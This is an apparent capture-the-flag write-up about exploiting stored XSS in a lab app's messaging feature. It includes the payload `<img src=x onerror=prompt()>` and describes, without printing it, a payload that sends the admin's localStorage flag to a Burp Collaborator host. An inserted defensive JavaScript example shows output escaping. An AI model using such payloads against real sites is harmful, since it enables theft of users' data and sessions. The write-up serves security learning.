Ottergram

Our favorite place to spot otters had an update and is now vulnerable to XSS. And I couldn't be happier with that.

I kinda had to guess where to start with trying for XSS, but because the messaging was a pretty new feature, I decided to start there. So I sent the payload `<img src=x onerror=prompt()>`. On the recipient's end it rendered, but it did not fire my payload.

So I decided to go look in Burp to see if there was some filtering going on. And I was correct.

So now I sent this request to Repeater, changed the payload again with the correct syntax and pressed send again. And now the payload did go off. So I created a payload to steal the flag inside the localStorage of the admin user with my Collaborator.
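Rendering the messaging feature's content safely, as an added example (not code from the write-up or from Ottergram): every message field is encoded for its HTML context instead of being checked against a blocklist, and only http(s) links are turned into anchors. The sample message is constructed, and `escapeHtml`, `linkify` and `renderMessage` are names chosen for this example.

```javascript
// Added example, not code from the Ottergram write-up or the target application.
// A blocklist filter looks for known-bad strings and, as the write-up shows, can be
// bypassed; encoding every untrusted character for the output context leaves no
// pattern to evade, so the browser shows the payload as text instead of running it.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode a string for an HTML text node or a double-quoted attribute value.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Turn http(s) URLs in ALREADY-ESCAPED text into anchors. Other schemes stay plain
// text. The matched URL is already attribute-safe (quotes and & were encoded), so it
// is reused as-is; rel/target are fixed by the template, not by the sender.
function linkify(escapedText) {
  return escapedText.replace(/\bhttps?:\/\/[^\s<>"']+/g, (url) =>
    `<a href="${url}" rel="noopener noreferrer" target="_blank">${url}</a>`);
}

// Render one message. Both fields come from the sender's JSON request, so both are
// untrusted; newlines become <br> only after escaping.
function renderMessage({ sender, body }) {
  const safeSender = escapeHtml(sender);
  const safeBody = linkify(escapeHtml(body)).replace(/\n/g, '<br>');
  return `<div class="message"><strong>${safeSender}</strong>: <span>${safeBody}</span></div>`;
}

// Constructed sample: the exact payload from the write-up, a normal link, and a
// non-http URL, as they might arrive in the message body.
const SAMPLE = {
  sender: 'otterfan',
  body: '<img src=x onerror=prompt()>\nsee https://example.com/otters?a=1&b=2 and ftp://files.example.com/x',
};

// Note: the exfiltration in the write-up worked because the flag sat in localStorage,
// which any script running on the origin can read; output encoding stops the script
// from running, but secrets still belong in HttpOnly cookies, not localStorage.
console.log(renderMessage(SAMPLE));
```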

It was difficult getting this payload into the JSON without breaking it, so I let ChatGPT do the lifting for me. Then I sent the payload on its way.

A few moments later, I got a response in Collaborator.

And in that response, I saw my flag 🇧🇪